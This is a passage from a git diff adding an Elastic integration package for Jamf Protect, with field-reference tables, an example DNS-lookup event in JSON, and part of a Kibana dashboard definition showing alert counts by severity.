ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date | +| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| file.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| file.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| file.gid | Primary group ID (GID) of the file. | keyword | +| file.hash.md5 | MD5 hash. | keyword | +| file.hash.sha1 | SHA1 hash. | keyword | +| file.hash.sha256 | SHA256 hash. | keyword | +| file.hash.sha512 | SHA512 hash. | keyword | +| file.inode | Inode representing the file in the filesystem. | keyword | +| file.mode | Mode of the file in octal representation. | keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| file.size | File size in bytes. Only relevant when `file.type` is "file". | long | +| file.uid | The user ID (UID) or security identifier (SID) of the file owner. | keyword | +| group.id | Unique identifier for the group on the system/platform. | keyword | +| group.name | Name of the group. | keyword | +| host.geo.country_iso_code | Country ISO code. | keyword | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.logger | The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | +| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | +| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword | +| observer.product | The product name of the observer. | keyword | +| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| organization.id | | keyword | +| process.args | Array of process arguments, starting with the absolute path to the executable. May be filtered to protect sensitive information. | keyword | +| process.args_count | Length of the process.args array. This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. | long | +| process.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| process.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| process.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard | +| process.command_line.text | Multi-field of `process.command_line`. | match_only_text | +| process.executable | Absolute path to the process executable. | keyword | +| process.executable.text | Multi-field of `process.executable`. | match_only_text | +| process.exit_code | The exit code of the process, if this is a termination event. The field should be absent if there is no exit code for the event (e.g. process start). | long | +| process.group_leader.pid | Process id. | long | +| process.hash.md5 | MD5 hash. | keyword | +| process.hash.sha1 | SHA1 hash. | keyword | +| process.hash.sha256 | SHA256 hash. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.parent.start | The time the process started. | date | +| process.pid | Process id. | long | +| process.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.real_user.id | Unique identifier of the user. | keyword | +| process.start | The time the process started. | date | +| process.tty | Information about the controlling TTY device. If set, the process belongs to an interactive session. | object | +| process.user.id | Unique identifier of the user. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| rule.description | The description of the rule generating the event. | keyword | +| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | +| rule.name | The name of the rule or signature generating the event. | keyword | +| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| source.port | Port of the source. | long | +| tags | List of keywords used to tag each event. | keyword | +| threat.enrichments | A list of associated indicators objects enriching the event, and the context of that association/enrichment. | nested | +| threat.framework | Name of the threat framework used to further categorize and classify the tactic and technique of the reported threat. Framework classification can be provided by detecting systems, evaluated at ingest time, or retrospectively tagged to events. | keyword | +| threat.software.platforms | The platforms of the software used by this threat to conduct behavior commonly modeled using MITRE ATT&CK®. While not required, you can use MITRE ATT&CK® software platform values. | keyword | +| threat.tactic.id | The id of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword | +| threat.tactic.name | Name of the type of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/) | keyword | +| threat.tactic.reference | The reference url of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword | +| threat.technique.id | The id of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| threat.technique.name | The name of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| threat.technique.name.text | Multi-field of `threat.technique.name`. | match_only_text | +| threat.technique.reference | The reference url of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.email | User email address. | keyword | +| user.id | Unique identifier of the user. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | +| volume.bus_type | | keyword | +| volume.file_system_type | | keyword | +| volume.nt_name | | keyword | +| volume.product_id | | keyword | +| volume.product_name | | keyword | +| volume.removable | | boolean | +| volume.serial_number | | keyword | +| volume.size | | long | +| volume.vendor_id | | keyword | +| volume.vendor_name | | keyword | +| volume.writable | | boolean | + + +#### network traffic stream + +This is the `Network Traffic Stream` dataset. + +##### Example + +An example event for `web_traffic_events` looks as following: + +```json +{ + "dns": { + "answers": { + "ttl": 101, + "type": "HTTPS" + }, + "question": { + "name": "s.youtube.com", + "registered_domain": "youtube", + "top_level_domain": "com" + }, + "response_code": "NOERROR" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DNS Lookup", + "category": [ + "host", + "network" + ], + "kind": "event", + "module": "jamf_protect", + "outcome": [ + "success" + ], + "provider": "Jamf Protect", + "reason": "CLEAN", + "start": "2024-02-02T06:26:04.273Z", + "type": [ + "connection" + ] + }, + "host": { + "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c", + "os": { + "type": [ + "ios" + ] + } + }, + "interface": { + "name": "WIFI" + }, + "jamf_protect": {}, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "name": "DNS Lookup" + }, + "user": { + "email": "user@acme.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| destination.as.organization.name | Organization name. | keyword | +| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text | +| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| destination.geo.city_name | City name. | keyword | +| destination.geo.continent_name | Name of the continent. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.geo.country_name | Country name. | keyword | +| destination.geo.location | Longitude and latitude. | geo_point | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | +| dns.answers.ttl | The time interval in seconds that this resource record may be cached before it should be discarded. Zero values mean that the data should not be cached. | long | +| dns.answers.type | The type of data contained in this resource record. | keyword | +| dns.question.name | The name being queried. If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. | keyword | +| dns.question.registered_domain | The highest registered domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| dns.question.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| dns.response_code | The DNS response code. | keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long | +| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date | +| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| file.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| file.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| file.gid | Primary group ID (GID) of the file. | keyword | +| file.hash.md5 | MD5 hash. | keyword | +| file.hash.sha1 | SHA1 hash. | keyword | +| file.hash.sha256 | SHA256 hash. | keyword | +| file.hash.sha512 | SHA512 hash. | keyword | +| file.inode | Inode representing the file in the filesystem. | keyword | +| file.mode | Mode of the file in octal representation. | keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| file.size | File size in bytes. Only relevant when `file.type` is "file". | long | +| file.uid | The user ID (UID) or security identifier (SID) of the file owner. | keyword | +| group.id | Unique identifier for the group on the system/platform. | keyword | +| group.name | Name of the group. | keyword | +| host.geo.country_iso_code | Country ISO code. | keyword | +| interface.name | Interface name as reported by the system. | keyword | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.logger | The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | +| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | +| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword | +| observer.product | The product name of the observer. | keyword | +| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| organization.id | | keyword | +| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard | +| process.command_line.text | Multi-field of `process.command_line`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.parent.start | The time the process started. | date | +| process.pid | Process id. | long | +| process.start | The time the process started. | date | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| rule.description | The description of the rule generating the event. | keyword | +| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | +| rule.name | The name of the rule or signature generating the event. | keyword | +| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| source.port | Port of the source. | long | +| tags | List of keywords used to tag each event. | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.email | User email address. | keyword | +| user.id | Unique identifier of the user. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | diff --git a/packages/jamf_protect/img/jamf_logo.svg b/packages/jamf_protect/img/jamf_logo.svg new file mode 100644 index 00000000000..a281ed4b057 --- /dev/null +++ b/packages/jamf_protect/img/jamf_logo.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/packages/jamf_protect/img/jamfprotect_kibana.png b/packages/jamf_protect/img/jamfprotect_kibana.png new file mode 100644 index 00000000000..60699e21045 Binary files /dev/null and b/packages/jamf_protect/img/jamfprotect_kibana.png differ diff --git a/packages/jamf_protect/kibana/dashboard/jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f.json b/packages/jamf_protect/kibana/dashboard/jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f.json new file mode 100644 index 00000000000..8e6ffc2ea67 --- /dev/null +++ b/packages/jamf_protect/kibana/dashboard/jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f.json @@ -0,0 +1,1949 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"d1892683-e559-40f2-9b70-90e8e29439f7\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"d1892683-e559-40f2-9b70-90e8e29439f7\",\"fieldName\":\"host.hostname\",\"title\":\"hostname\",\"grow\":true,\"width\":\"small\",\"enhancements\":{},\"selectedOptions\":[]}},\"04593aef-ec66-4a07-a579-13a12d086631\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"small\",\"explicitInput\":{\"id\":\"04593aef-ec66-4a07-a579-13a12d086631\",\"fieldName\":\"event.module\",\"title\":\"Product module\",\"grow\":true,\"width\":\"small\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}},\"bcdd443f-9e3d-4186-be15-ba54190ae096\":{\"type\":\"timeSlider\",\"order\":0,\"grow\":true,\"width\":\"large\",\"explicitInput\":{\"id\":\"bcdd443f-9e3d-4186-be15-ba54190ae096\",\"title\":\"Time slider\",\"enhancements\":{},\"timesliceStartAsPercentageOfTimeRange\":0.08333333429783951,\"timesliceEndAsPercentageOfTimeRange\":0.9583333444251545}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Jamf Protect\n\nThis Kibana dashboard features a range of visualizations highlighting key events and the most recent alerts. It serves as a customizable template, allowing adjustments to meet specific organizational needs.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 5, + "i": "1e937160-72d3-495f-9d99-a5441c7f7a72", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "1e937160-72d3-495f-9d99-a5441c7f7a72", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b": { + "columnOrder": [ + "5760cc55-e167-4ca1-882c-27413cb07e5e" + ], + "columns": { + "5760cc55-e167-4ca1-882c-27413cb07e5e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Low Alerts", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "(observer.product : \"Jamf Protect\" and event.module : \"Alerts\" and event.severity : 1) or (observer.product :\"Jamf Protect\" and event.module :\"Threat Events Stream\" and event.severity : 4)" + }, + "visualization": { + "accessor": "5760cc55-e167-4ca1-882c-27413cb07e5e", + "colorMode": "Background", + "layerId": "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#D6BF57", + "stop": null + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#D6BF57", + "stop": 4 + } + ] + }, + "type": "palette" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "a8e0995f-628e-43ff-8052-0ec18332c1da", + "w": 16, + "x": 0, + "y": 5 + }, + "panelIndex": "a8e0995f-628e-43ff-8052-0ec18332c1da", + "title": "Low Alerts", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b": { + "columnOrder": [ + "5760cc55-e167-4ca1-882c-27413cb07e5e" + ], + "columns": { + "5760cc55-e167-4ca1-882c-27413cb07e5e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Medium Alerts", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "(observer.product : \"Jamf Protect\" and event.module : \"Alerts\" and event.severity : 2) or (observer.product :\"Jamf Protect\" and event.module :\"Threat Events Stream\" and event.severity : 6)" + }, + "visualization": { + "accessor": "5760cc55-e167-4ca1-882c-27413cb07e5e", + "colorMode": "Background", + "layerId": "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#DA8B45", + "stop": null + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#DA8B45", + "stop": 4 + } + ] + }, + "type": "palette" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": { + "dynamicActions": { + "events": [ + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Review alerts" + }, + "eventId": "585bae4f-9417-4f77-82ec-8f5c84ecde25", + "triggers": [ + "FILTER_TRIGGER" + ] + } + ] + } + }, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "1d177394-ad48-4393-b81c-319a894a5686", + "w": 16, + "x": 16, + "y": 5 + }, + "panelIndex": "1d177394-ad48-4393-b81c-319a894a5686", + "title": "Medium Alerts", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b": { + "columnOrder": [ + "5760cc55-e167-4ca1-882c-27413cb07e5e" + ], + "columns": { + "5760cc55-e167-4ca1-882c-27413cb07e5e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Medium Alerts", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "(observer.product : \"Jamf Protect\" and event.module : \"Alerts\" and event.severity : 3) or (observer.product :\"Jamf Protect\" and event.module :\"Threat Events Stream\" and event.severity \u003e= 8)" + }, + "visualization": { + "accessor": "5760cc55-e167-4ca1-882c-27413cb07e5e", + "colorMode": "Background", + "layerId": "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#E7664C", + "stop": null + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#E7664C", + "stop": 28 + } + ] + }, + "type": "palette" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "a5ced168-f931-484a-bf34-898dee052142", + "w": 16, + "x": 32, + "y": 5 + 